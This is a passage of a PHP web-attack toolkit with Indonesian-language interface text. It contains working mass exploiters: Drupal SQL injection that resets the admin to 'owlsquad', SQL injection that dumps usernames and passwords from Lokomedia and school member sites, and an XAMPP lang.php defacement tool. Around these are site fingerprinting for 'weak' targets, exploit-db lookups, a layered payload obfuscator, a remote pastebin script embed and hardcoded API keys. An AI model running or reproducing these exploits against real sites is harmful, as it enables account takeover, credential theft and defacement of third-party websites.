680$headers = get_headers("$url$admin");
681if (eregi('200', $headers[0])) {
682 echo "[<a href='$url/$admin'>$url$admin</a> <font color='gold'>Ketemu Nih !</font><br />";
683}
684else {
685 echo "$url$admin <font color='red'>Tidak Ketemu</font><br />";
686 echo "<center>";
687}
688}
689}
690echo "</center>";
691}
692if($_GET['go'] == 'drupal') {
693 echo "<div class='mybox'>
694<center><h1>Drupal Mass Exploiter</h1><hr color='white'><br>
695<form method='post' action=''>
696<textarea rows='10'class='mybox' cols='10' name='url'>
697http://www.site.com
698http://www.site2.com</textarea><br><br>
699<input type='submit' class='kotak' style='border-color:white' name='submit' value='SIKAT!'>
700</form>
701</div>
702";
703$drupal = ($_GET["drupal"]);
704if($drupal == 'drupal'){
705$filename = $_FILES['file']['name'];
706$filetmp = $_FILES['file']['tmp_name'];
707echo "<div class='mybox'><form method='POST' enctype='multipart/form-data'>
708 <input type='file'name='file' />
709 <input type='submit' value='drupal !' />
710</form></div>";
711move_uploaded_file($filetmp,$filename);
712}
713 error_reporting(0);
714 if (isset($_POST['submit'])) {
715 function exploit($url) {
716 $post_data = "name[0;update users set name %3D 'owlsquad' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
717 $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
718", 'content' => $post_data));
719 $ctx = stream_context_create($params);
720 $data = file_get_contents($url . '/user/login/', null, $ctx);
721 if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
722 $fp = fopen("exploited.txt", 'a+');
723 fwrite($fp, "Exploitied User: owlsquad Pass: owlsquad =====> {$url}/user/login");
724 fwrite($fp, "
725");
726 fwrite($fp, "--------------------------------------------------------------------------------------------------");
727 fwrite($fp, "
728");
729 fclose($fp);
730
731 echo "<font color='lime'><b>Success:<font color='white'>owlsquad</font> Pass:<font color='white'>owlsquad</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
732 } else {
733 echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
734 }
735 }
736
737 $urls = explode("
738", $_POST['url']);
739 foreach ($urls as $url) {
740 $url = @trim($url);
741 echo exploit($url);
742 }
743 }
744
745}
746elseif ($_GET['go'] == 'alexa') {
747 # code...
748echo "<center>
749<h1>AlexaRanks/moz rank Mass Checker</h1><hr>
750<form method='post'>
751<textarea name='url_form' cols='40' rows='8' style='width: 400px'>";
752?>
753<?php
754$_REQUEST['url_form'];
755echo "</textarea >
756<br />
757<input type='radio' name='alexa'> [Alexa-Ranks]
758<input type='radio' name='moz'> [DA/PA+MozRanks]<br>
759<input type='submit' style='margin-top: 5px; font-size: 18px' value='Check Metrics' />
760</form>
761</center>";
762$url1 = explode("\r\n",$_POST['url_form']);
763if($_POST['alexa']){
764 echo '<div style="margin: auto; width: 50%; min-width: 400px">
765<table width="500" cellpadding="5" cellspacing="5">
766<thead style="text-align: left">
767<tr><th>WEB</th><th>RANKS</th><th>COUNTRY</th><th>RANK</th></tr></thead>
768<tbody>';
769foreach ($url1 as $url){
770 $p = parse_url($url);
771$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$p['host']);
772
773$rank = isset($xml->SD[1]->POPULARITY)?$xml->SD[1]->POPULARITY->attributes()->TEXT:0;
774
775$negara = isset($xml->SD[1]->COUNTRY)?$xml->SD[1]->COUNTRY->attributes()->NAME:0;
776
777$web = (string)$xml->SD[0]->attributes()->HOST;
778
779$negara1 = isset($xml->SD[1]->COUNTRY)?$xml->SD[1]->COUNTRY->attributes()->RANK:0;
780
781echo "<tr><td> ".$web." </td><td> ".$rank."</td><td>".$negara." </td><td> ".$negara1."</td></tr>";
782}
783
784echo '</tbody></table>
785<br><br>';
786}
787
788if($_REQUEST['moz']) {
789$urls = trim($_POST['url_form']);
790$urls = explode("\n", $urls);
791$urls = array_filter($urls, 'trim');
792}
793if(!$urls) {
794exit;
795}
796echo '<div style="margin: auto; width: 50%; min-width: 400px">
797<table width="500" cellpadding="5" cellspacing="5">
798<thead style="text-align: left">
799<tr><th>ID</th><th>URL</th><th>DA</th><th>PA</th><th>MR</th><th>EL</th></tr></thead>
800<tbody>';
801?>
802<?php
803$hitung = 0;
804$urlx = array();
805$verif_url = array_chunk($urls,80);
806foreach($verif_url as $chunk) {
807sleep(2);
808unset($url);
809$url = $chunk;
810$seo = API_MOZ($url);
811if($seo['error'] != '') {
812echo "Error[SEOMoz]: ".$seo['error']."<br>";
813} else {
814foreach($seo as $index => $data) {
815$urls['pa'] = number_format($data['pa'], 0, '.', '');
816$urls['url'] = $data['url'];
817$urls['da'] = number_format($data['da'], 0, '.', '');
818$urls['title'] = $data['title'];
819$urls['external_links'] = $data['external_links'];
820$urls['mozrank'] = number_format($data['mozrank'], 2, '.', '');
821$hitung++;
822echo "<tr><td>";
823echo $hitung;
824echo "</td><td>";
825echo str_replace("http://","",$urls['url']);
826echo "</td><td>";
827echo $urls['da'];
828echo "</td><td>";
829echo $urls['pa'];
830echo "</td><td>";
831echo $urls['mozrank'];
832echo "</td><td>";
833echo $urls['external_links'];
834echo "</td>";
835echo "</tr>";
836$urlx[] = $urls;
837}
838}
839}
840?>
841echo '</tbody></table>
842<br><br>';
843<?php
844$_SESSION['urlx'] = $urlx;
845if(!empty($urlx)) { }
846?>
847echo '</center>
848</div>';
849<?php
850// Document code by Moz
851// www.stateofdigital.com
852function API_MOZ($objectURL) {
853// cek https://moz.com/products/api/keys untuk mendapatkan accessID dan secretKey nya
854// your accessID
855$accessID = "mozscape-4f3765f6c2";
856// your secretKey
857$secretKey = "72c60c0d7f5bc0fad86ab432eaaf32ce";
858$expires = time() + 600;
859$stringToSign = $accessID."\n".$expires;
860$binarySignature = hash_hmac('sha1', $stringToSign, $secretKey, true);
861$urlSafeSignature = urlencode(base64_encode($binarySignature));
862$cols = 68719476736+34359738368+536870912+32768+16384+2048+32+4;
863$requestUrl = "http://lsapi.seomoz.com/linkscape/url-metrics/?Cols=".$cols."&AccessID=".$accessID."&Expires=".$expires."&Signature=".$urlSafeSignature;
864$batchedDomains = $objectURL;
865$encodedDomains = json_encode($batchedDomains);
866$options = array(CURLOPT_RETURNTRANSFER => true, CURLOPT_POSTFIELDS =>$encodedDomains);
867$ch = curl_init($requestUrl);
868curl_setopt_array($ch, $options);
869$content = curl_exec($ch);
870curl_close( $ch );
871$response = json_decode($content,true);
872$count = 0;
873if(isset($response['error_message'])) {
874$list = array('error'=>$response['error_message']);
875} else {
876foreach($response as $metric) {
877$list[$count]['url'] = $objectURL[$count];
878$list[$count]['subdomain'] = $metric['ufq'];
879$list[$count]['domain'] = $metric['upl'];
880$list[$count]['pa'] = $metric['upa'];
881$list[$count]['da'] = $metric['pda'];
882$list[$count]['mozrank'] = $metric['umrp'];
883$list[$count]['title'] = $metric['ut'];
884$list[$count]['external_links'] = $metric['ueid'];
885$count++;
886}
887}
888return $list;
889}
890}
891elseif ($_GET['go'] == 'domain') {
892 # code...
893echo '<center>
894<h1>domain grabber</h1><hr color=white><form action="" method="POST">
895<textarea name="text" placeholder="souce "></textarea>
896<br><input type=txt name="shell"></input>
897<input type="radio" name="gb1"> Grabber
898<input type="radio" name="gb2"> Parse
899<input type="radio" name="gb3"> script defacement mirror
900<input type="radio" name="gb4"> add http
901<br><input type="submit" name="zone" value="Extract"></form></center><center>';
902if($_POST['gb1']){
903 $data = $_POST['text'];
904 preg_match_all('#((www.)?[a-z0-9-]+\.([a-z]{2,4}\.)?[a-z]+/(?:.*))#' , $data , $result);
905 echo "<textarea>";
906 for ($x = 0, $jumlah = count($result[0]); $x < $jumlah; $x++) {
907$ee = parse_url("http://".$result[1][$x]);
908echo "http://".$ee['host']."\n";
909}
910echo "</textarea></center>";
911}
912
913if($_POST['gb2']){
914 $data = $_POST['text'];
915 preg_match_all('/[(] (.*?) [)]/' , $data , $result);
916 echo "<textarea>";
917 for ($x = 0, $jumlah = count($result[0]); $x < $jumlah; $x++) {
918$ee = parse_url("http://".$result[1][$x]);
919echo "http://".$ee['host']."\n";
920}
921echo "</textarea>";
922}
923if($_POST['gb3']){
924 $data = $_POST['text'];
925 $shell = $_POST['shell'];
926 preg_match_all('#((www.)?[a-z0-9-]+\.([a-z]{2,4}\.)?[a-z]+/(?:.*))#' , $data , $result);
927 echo "<textarea>";
928 for ($x = 0, $jumlah = count($result[0]); $x < $jumlah; $x++) {
929$ee = parse_url("http://".$result[1][$x]);
930echo "http://".$ee['host'].$shell."\n";
931}
932echo "</textarea></center>";
933}
934if($_POST['gb4']){
935 $data = $_POST['text'];
936// memecah string input berdasarkan karakter '\r\n\r\n'
937$pecah = explode("\r\n", $data);
938
939// string kosong inisialisasi
940$text = "";
941
942// untuk setiap substring hasil pecahan, sisipkan <p> di awal dan </p> di akhir
943// lalu menggabungnya menjadi satu string utuh $text
944for ($i=0; $i<=count($pecah)-1; $i++)
945{
946 $part = str_replace($pecah[$i], "http://".$pecah[$i], $pecah[$i]."\n");
947 $text .= $part;
948}
949
950// menampilkan outputnya
951 echo "<textarea>";
952echo $text;
953}
954echo "</textarea></center>";
955}
956elseif ($_GET['go'] == 'sqlbalitbang') {
957echo "<center><form action='' method='POST'>
958<input type='text' name='target' placeholder='target.sch.id'><br>
959<font color='white'><textarea cols='50' color='white' rows='10' name='sqli'>make_set(6,@:=0x0a,(select(1)from(t_member)where@:=make_set(511,@,0x3c6c693e,username,password)),@)</textarea><br>
960Note : concat(0x3c2f613e,command);<br><br>";
961echo "<input type='submit' name='inject' value='Inject'>
962</form></center><hr size='1'></center>";
963if(isset($_POST['inject'])){
964$target=$_POST['target'];
965$sqli=$_POST['sqli'];
966echo "<font size='3'>Url : $target<br>Command : $sqli<br><br> Output : ";
967$ch = curl_init();curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_URL, "$target/member/listmemberall.php");curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, "queryString=hantu%'/**/union/**/select/**/$sqli,version()-- -");curl_setopt($ch, CURLOPT_TIMEOUT, 3);curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);curl_setopt($ch, CURLOPT_VERBOSE, true);$buf = curl_exec ($ch);curl_close($ch);
968unset($ch);
969sleep(1);
970echo "<textarea>$buf";
971echo "</textarea>";
972}
973}
974elseif ($_GET['go'] == 'cmsscanner') {
975echo '<center><form action="" method="POST">
976<textarea name=site></textarea><br>
977<input style="width: 300px;" type=submit name=au>
978</center>';
979
980// 0x1999
981// Web Based By UstadCage_48
982function send($url){
983 $ch = curl_init();
984 curl_setopt($ch, CURLOPT_URL, $url);
985 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
986 $output = curl_exec($ch);
987 curl_close($ch);
988 return $output;
989}
990function save($site,$ext){
991 $fp = fopen("$ext.txt", 'a');
992 fwrite($fp, "$site
993 ");
994 fclose($fp);
995}
996function detect($site){
997 $send = send($site);
998if(preg_match('/\/wp-content\/|\/wp-includes\/|\/xmlrpc.php/',$send)) {
999 echo "[WordPress]: $site<br>";
1000echo save("$site","WordPress");
1001}
1002elseif(preg_match('/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>|Joomla|\/media\/system\/js\/|mootools-core.js|com_content|Joomla!/',$send)) {
1003 echo "[Joomla]: $site<br>";
1004echo save("$site","Joomla");
1005 }
1006elseif(preg_match('/\/faq.php\/vb|\/clientscript\/|vBulletin|vbulletin/',$send)) {
1007 echo "[VBulletin]: $site<br>";
1008echo save("$site","vbulletin");
1009 }
1010elseif(preg_match('/Drupal|drupal|sites\/all|drupal.org/',$send)) {
1011 echo "[Drupal]: $site<br>";
1012echo save("$site","Drupal");
1013 }
1014elseif(preg_match('/\/skin\/frontend\/base\/default\/|\/\/magentocore.net\/mage\/mage.js|\/webforms\/index\/index\/|\/customer\/account\/login/',$send)) {
1015 echo "[Magento]: $site<br>";
1016echo save("$site","Magento");
1017 }
1018elseif(preg_match('/route=product|OpenCart|route=common|catalog\/view\/theme/',$send)) {
1019 echo "[OpenCart]: $site<br>";
1020echo save("$site","OpenCart");
1021 }
1022elseif(preg_match('/zcadmin\/login.php|zcadmin|zencart/',$send)) {
1023 echo "[ZenCart]: $site<br>";
1024echo save("$site","ZenCart");
1025 }
1026elseif(preg_match('/\/collections\/all|Powered by Shopify|\/\/cdn.shopify.com\//',$send)) {
1027 echo "[Shopify]: $site<br>";
1028echo save("$site","Shopify");
1029 }
1030
1031elseif(preg_match('/xenforo|XenForo|uix_sidePane_content/',$send)) {
1032 echo "[XenForo]: $site<br>";
1033echo save("$site","XenForo");
1034 }
1035elseif(preg_match('/semua-agenda.html|foto_banner\/|lokomedia/',$send)) {
1036 echo "[Lokomedia]: $site<br>";
1037echo save("$site","Lokomedia");
1038 }
1039elseif(preg_match('/typo3|TYPO3|Typo3/',$send)) {
1040 echo "[Typo3]: $site<br>";
1041echo save("$site","Typo3");
1042 }
1043elseif(preg_match('/filemanager.php|filemanager|fileman|\/assets\/global\/plugins\/|\/assets\/plugins\/|\/assets\/public\/plugins\/|\/assets\/private\/plugins\/|\/assets\/admin|\/admin\/plugins\/|assets\/dashboard\//',$send)) {
1044 echo "[ Filemanager Source ]: $site<br>";
1045echo save("$site","filemanager_source");
1046 }
1047elseif(preg_match('/upload.php|admin.php|administrator.php|upload file|input type=\"file\"/',$send)) {
1048 echo "[Weak Website]: $site<br>";
1049echo save("$site","Weak_website");
1050 }
1051elseif(preg_match('/porn|blowjob/',$send)) {
1052 echo "[X]: $site<br>";
1053echo save("$site","xxx");
1054 }
1055elseif(preg_match("/\/feeds\/posts\/default?alt=rss|meta content=\'blogger\' name=\'generator\'/",$send)) {
1056 echo "[Typo3]: $site<br>";
1057echo save("$site","TYPO3");
1058 }
1059elseif(preg_match('/Liferay|liferay/',$send)) {
1060 echo "[Liferay]: $site<br>";
1061echo save("$site","Liferay");
1062 }
1063elseif(preg_match('/Wolf|Wolf CMS|\?admin/',$send)) {
1064 echo "[Wolf]: $site<br>";
1065echo save("$site","Wolf");
1066 }
1067elseif(preg_match('/timthumb|\/tim.php|\/thumb.php|\/foto.php/',$send)) {
1068 echo "[Timthumb]: $site<br>";
1069echo save("$site","Timthumb");
1070 }
1071elseif(preg_match('/Index of|Last modified/',$send)) {
1072 echo "[Naked Website]: $site<br>";
1073echo save("$site","Naked_website");
1074 }
1075elseif(preg_match('/mcc.godaddy.com\/park\/|domain has expired|Domain Expired|domain expired|Undermainteance|mcc.godaddy.com|Under Construction|Construction|expired/',$send)) {
1076 echo "[Expired]: $site<br>";
1077echo save("$site","Expired");
1078 }
1079elseif(preg_match('/html|head|body/',$send)) {
1080 echo "[Live But Unknown]: $site<br>";
1081echo save("$site","Live_but_unknown");
1082 }
1083else{
1084 echo "[Unknown]: $site<br>";
1085echo save("$site","Unknown");
1086}
1087}
1088
1089$er = explode("\r\n",$_POST['site']);
1090if($_POST['au']){
1091 echo "<br>";
1092foreach($er as $sites){
1093 echo detect($sites);
1094}
1095}
1096}
1097elseif($_GET['go'] == 'cmsvuln') {
1098 @set_time_limit(0);
1099 @error_reporting(0);
1100// Script Functions , start ..!
1101function ask_exploit_db($component){
1102$exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
1103$result = @file_get_contents($exploitdb);
1104if (eregi("No results",$result)) {
1105echo"<td>Gak ada</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
1106}else{
1107echo"<td><a href='$exploitdb'>Klik Ini..!</a></td><td><--</td></tr>";
1108}
1109}
1110/**************************************************************/
1111/* Joomla Conf */
1112function get_components($site){
1113$source = @file_get_contents($site);
1114preg_match_all('{option,(.*?)/}i',$source,$f);
1115preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2);
1116preg_match_all('{/components/(.*?)/}i',$source,$f3);
1117$arz=array_merge($f2[1],$f[1],$f3[1]);
1118$coms=array();
1119if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
1120foreach(array_unique($arz) as $x){
1121$coms[]=$x;
1122}
1123foreach($coms as $comm){
1124echo "<tr><td>$comm</td>";
1125ask_exploit_db($comm);
1126}
1127}
1128/**************************************************************/
1129/* WP Conf */
1130function get_plugins($site){
1131$source = @file_get_contents($site);
1132preg_match_all("#/plugins/(.*?)/#i", $source, $f);
1133$plugins=array_unique($f[1]);
1134if(count($plugins)==0){ echo "<tr><td style='border-color:white' colspan=1>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
1135foreach($plugins as $plugin){
1136echo "<tr><td>$plugin</td>";
1137ask_exploit_db($plugin);
1138}
1139}
1140/**************************************************************/
1141/* Nuke's Conf */
1142function get_numod($site){
1143$source = @file_get_contents($site);
1144preg_match_all('{?name=(.*?)/}i',$source,$f);
1145preg_match_all('{?name=(.*?)(&|&|l_op=")}i',$source,$f2);
1146preg_match_all('{/modules/(.*?)/}i',$source,$f3);
1147$arz=array_merge($f2[1],$f[1],$f3[1]);
1148$coms=array();
1149if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
1150foreach(array_unique($arz) as $x){
1151$coms[]=$x;
1152}
1153foreach($coms as $nmod){
1154echo "<tr><td>$nmod</td>";
1155ask_exploit_db($nmod);
1156}
1157}
1158/*****************************************************/
1159/* Xoops Conf */
1160function get_xoomod($site){
1161$source = @file_get_contents($site);
1162preg_match_all('{/modules/(.*?)/}i',$source,$f);
1163$arz=array_merge($f[1]);
1164$coms=array();
1165if(count($arz)==0){ echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>";}
1166foreach(array_unique($arz) as $x){
1167$coms[]=$x;
1168}
1169foreach($coms as $xmod){
1170echo "<tr><td>$xmod</td>";
1171ask_exploit_db($xmod);
1172}
1173}
1174/**************************************************************/
1175 /* Header */
1176function t_header($site){
1177echo'<br><hr color="white"><br><table align="center" border="1" style="border-color=white; text-align:left;" width="50%" cellspacing="1" cellpadding="5">';
1178echo'
1179<tr>
1180<td>Site : <a href="'.$site.'">'.$site.'</a></td>
1181<td>Exploit-db</b></td>
1182<td>Exploit it !</td>
1183</tr>
1184';
1185}
1186echo '<div class="mybox" style="text-align:left"><center>
1187<h1>CMS Vulnerability Scanner</h1><hr color="white">
1188<form method="POST" action="" class="header-izz">
1189 <p>Link  <input type="text" width:500px;" name="site" value="http://127.0.0.1/" >
1190 <br><br>
1191 CMS
1192    <select name="pilihan" width:500px;">
1193 <option>Wordpress</option>
1194 <option>Joomla</option>
1195 <option>Nukes</option>
1196 <option>Xoops</option>
1197 </select><br><br>       <input type="submit" style="width: 50px; height: 30px;" value="Sikat" class="kotak"></p>
1198</form>';
1199// Start Scan :P :P ...
1200if($_POST){
1201$site=strip_tags(trim($_POST['site']));
1202t_header($site);
1203echo $x01 = ($_POST['pilihan']=="Wordpress") ? get_plugins($site):"";
1204echo $x02 = ($_POST['pilihan']=="Joomla") ? get_components($site):"";
1205echo $x03 = ($_POST['pilihan']=="Nuke's") ? get_numod($site):"";
1206echo $x04 = ($_POST['pilihan']=="Xoops") ? get_xoomod($site):"";
1207}
1208exit;
1209}
1210elseif($_GET['go'] == 'roottutor') {
1211echo "<script src='https://pastebin.com/embed_js/i1mV6Zjf'></script><br><br><br><br><br><br><br><br>";
1212}
1213elseif($_GET['go'] == '64base') {
1214
1215@ini_set('output_buffering',0);
1216@ini_set('display_errors', 0);
1217$text = $_POST['code'];
1218?>
1219<form method="post"><br><center>
1220<textarea class='form-control con7' cols=80 rows=10 name="code"></textarea><br><br>
1221<select class='form-control con7' size="1" name="ope">
1222<center><option value="urlencode">url</option>
1223<option value="base64">Base64</option>
1224<option value="ur">convert_uu</option>
1225<option value="json">json</option>
1226<option value="gzinflates">gzinflate - base64</option>
1227<option value="str2">str_rot13 - base64</option>
1228<option value="gzinflate">str_rot13 - gzinflate - base64</option>
1229<option value="gzinflater">gzinflate - str_rot13 - base64</option>
1230<option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
1231<option value="gzinflatew">str_rot13-convert_uu-url-gzinflate-str_rot13-base64-convert_uu-gzinflate-url-str_rot13-gzinflate-base64</option>
1232
1233<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
1234<option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option></center>
1235</select> <br><br><input class='kntd' type='submit' name='submit' value='Encode'>
1236<input class='kntd' type='submit' name='submits' value='Decode'>
1237</form>
1238<br>
1239<?php
1240$submit = $_POST['submit'];
1241if (isset($submit)){
1242$op = $_POST["ope"];
1243switch ($op) {case 'base64': $codi=base64_encode($text);
1244break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
1245break;case 'json' : $codi=json_encode(utf8_encode($text));
1246break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
1247break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
1248break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
1249break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
1250break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
1251break;case 'str2' : $codi=base64_encode(str_rot13($text));
1252break;case 'urlencode' : $codi=rawurlencode($text);
1253break;case 'ur' : $codi=convert_uuencode($text);
1254break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
1255break;default:break;}}
1256
1257$submit = $_POST['submits'];
1258if (isset($submit)){
1259$op = $_POST["ope"];
1260switch ($op) {case 'base64': $codi=base64_decode($text);
1261break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
1262break;case 'json' : $codi=utf8_dencode(json_dencode($text));
1263break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
1264break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
1265break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
1266break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
1267break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
1268break;case 'str2' : $codi=str_rot13(base64_decode($text));
1269break;case 'urlencode' : $codi=rawurldecode($text);
1270break;case 'ur' : $codi=convert_uudecode($text);
1271break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
1272break;default:break;}}
1273$html = htmlentities(stripslashes($codi));
1274echo "<from><textarea cols=80 rows=10 class='form-control con7' >".$html."</textarea><BR/><BR/></center><br></from>";
1275
1276}
1277
1278
1279
1280
1281
1282
1283 elseif($_GET['go'] == 'lokmed')
1284 {
1285?>
1286<center class='mybox'><h1>CMS Lokomedia Auto Exploiter</h1><hr color='white'><br><br>
1287<form method='post'>
1288<textarea name='sites' style='border-color=white;' value='contoh:http://127.0.0.1/hal-tentang-kami.html' cols='50' rows='12'></textarea><br><br>
1289<input type='submit' name='go' value='SIKAT!' style='border-color=white;' class='kotak'>
1290</FORM></center>
1291<?php
1292error_reporting(0);
1293set_time_limit(0);
1294$ya=$_POST['go'];
1295$co=$_POST['sites'];
1296
1297if($ya){
1298$e=explode("rn",$co);
1299foreach($e as $bda){
1300$fp = fopen("cookie.txt", "w+");
1301$Cookie = realpath('cookie.txt');
1302$web = $bda."/statis--1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html";
1303$curl=curl_init();
1304curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1305curl_setopt($curl,CURLOPT_URL,"$web");
1306curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
1307curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, false);
1308curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
1309curl_setopt($curl,CURLOPT_COOKIEFILE, "$Cookie");
1310curl_setopt($curl,CURLOPT_TIMEOUT,5);
1311$gweb = curl_exec($curl);
1312$web2 = $bda."/statis--1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html";
1313$curl2=curl_init();
1314curl_setopt($curl2,CURLOPT_RETURNTRANSFER,1);
1315curl_setopt($curl2,CURLOPT_URL,"$web2");
1316curl_setopt($curl2,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
1317curl_setopt($curl2,CURLOPT_SSL_VERIFYPEER, false);
1318curl_setopt($curl2,CURLOPT_FOLLOWLOCATION,1);
1319curl_setopt($curl2,CURLOPT_COOKIEFILE, "$C2ookie");
1320curl_setopt($curl2,CURLOPT_TIMEOUT,5);
1321$gweb2 = curl_exec($curl2);
1322echo '<center><font face="courier" color="#00BFFF" >'.$bda.'</font><br><textarea rows="10" cols="40">'.htmlentities($gweb2).'</textarea>','<textarea rows="10" cols="40">'.htmlentities($gweb).'</textarea>';
1323$cek_admin = @file_get_contents("$bda/adminweb");
1324if(preg_match("/Copyright/", $cek_admin)) {
1325 echo "<BR><font color=green>Berandal</font> => <font color=white><a href='$bda/adminweb' target='_blank'>$bda/adminweb</a></font><br>";
1326 } else {
1327 echo "<br><br>[-] <font color=red> Gak Ada /adminweb, Jancok! -_-</font>[-]<br><br><hr color='white'>";
1328}}}}
1329
1330
1331elseif($_GET['go'] == 'lwa') {
1332?>
1333<div class='mybox'><h1><center>xampp lwa Auto Exploiter</center></h1><hr color='white'><br><br>
1334 <center><form method='POST' action=''>
1335 Target :<br>
1336 <textarea name='target' placeholder='target.com or target.com/[path]' required></textarea><br><br>
1337 kata kata terakhir :<br>
1338 <input type='text' name='pawn' placeholder='hacked by Indonesian h4x0r'/>
1339 <br><br>
1340 <input type='submit' value='Crott..!!!' />
1341 </form>
1342 <?php
1343 if($_POST){
1344 $target = $_POST['target'];
1345 $msg = htmlspecialchars(str_replace(" ","_",$_POST['pawn']));
1346 $msg1 = str_replace("<","_",$msg);
1347 $msg2 = str_replace(">","_",$msg1);
1348 $msg3 = str_replace(">","_",$msg2);
1349 $pwn = str_replace("<","_",$msg3);
1350
1351 if($pwn == ""){
1352 $pwn = "hacked_by_N45HT";
1353 }
1354
1355 $targets = explode("\r\n",$target);
1356 foreach($targets as $site){
1357 if(!preg_match("/^http:\/\//",$site) AND !preg_match("/^https:\/\//",$site)){
1358 $sites = "http://$site";
1359 }else{
1360 $sites = $site;
1361 }
1362
1363 $chx = curl_init("$sites/xampp/lang.tmp");
1364 curl_setopt($chx, CURLOPT_FOLLOWLOCATION, 1);
1365 curl_setopt($chx, CURLOPT_RETURNTRANSFER, 1);
1366 curl_exec($chx);
1367 $httpcodex = curl_getinfo($chx, CURLINFO_HTTP_CODE);
1368 curl_close($chx);
1369
1370 $chs = curl_init("$sites/security/lang.tmp");
1371 curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
1372 curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
1373 curl_exec($chs);
1374 $httpcodes = curl_getinfo($chs, CURLINFO_HTTP_CODE);
1375 curl_close($chs);
1376
1377 if($httpcodex == 200){
1378 $ck = curl_init("$sites/xampp/lang.php?$pwn");
1379 curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
1380 curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
1381 $cka = curl_exec($ck);
1382 if($cka){
1383 $ch = curl_init("$sites/xampp/lang.tmp");
1384 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1385 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1386 $cek = curl_exec($ch);
1387 if(preg_match("/$pwn/",$cek)){
1388 echo "[<a href='$sites/xampp/lang.tmp' target=_blank'>$sites/xampp/lang.tmp</a> => OK<br>";
1389 }else{
1390 echo "$sites => FAILED<br>";
1391 }
1392 curl_close($ch);
1393 }
1394 }else if($httpcodes == 200){
1395 $ck = curl_init("$sites/security/lang.php?$pwn");
1396 curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
1397 curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
1398 $cka = curl_exec($ck);
1399 if($cka){
1400 $ch = curl_init("$sites/security/lang.tmp");
1401 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1402 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1403 $cek = curl_exec($ch);
1404 if(preg_match("/$pwn/",$cek)){
1405 echo "[<a href='$sites/security/lang.tmp' target=_blank'>$sites/security/lang.tmp</a> => OK<br>";
1406 }else{
1407 echo "$sites => FAILED<br>";
1408 }
1409 curl_close($ch);
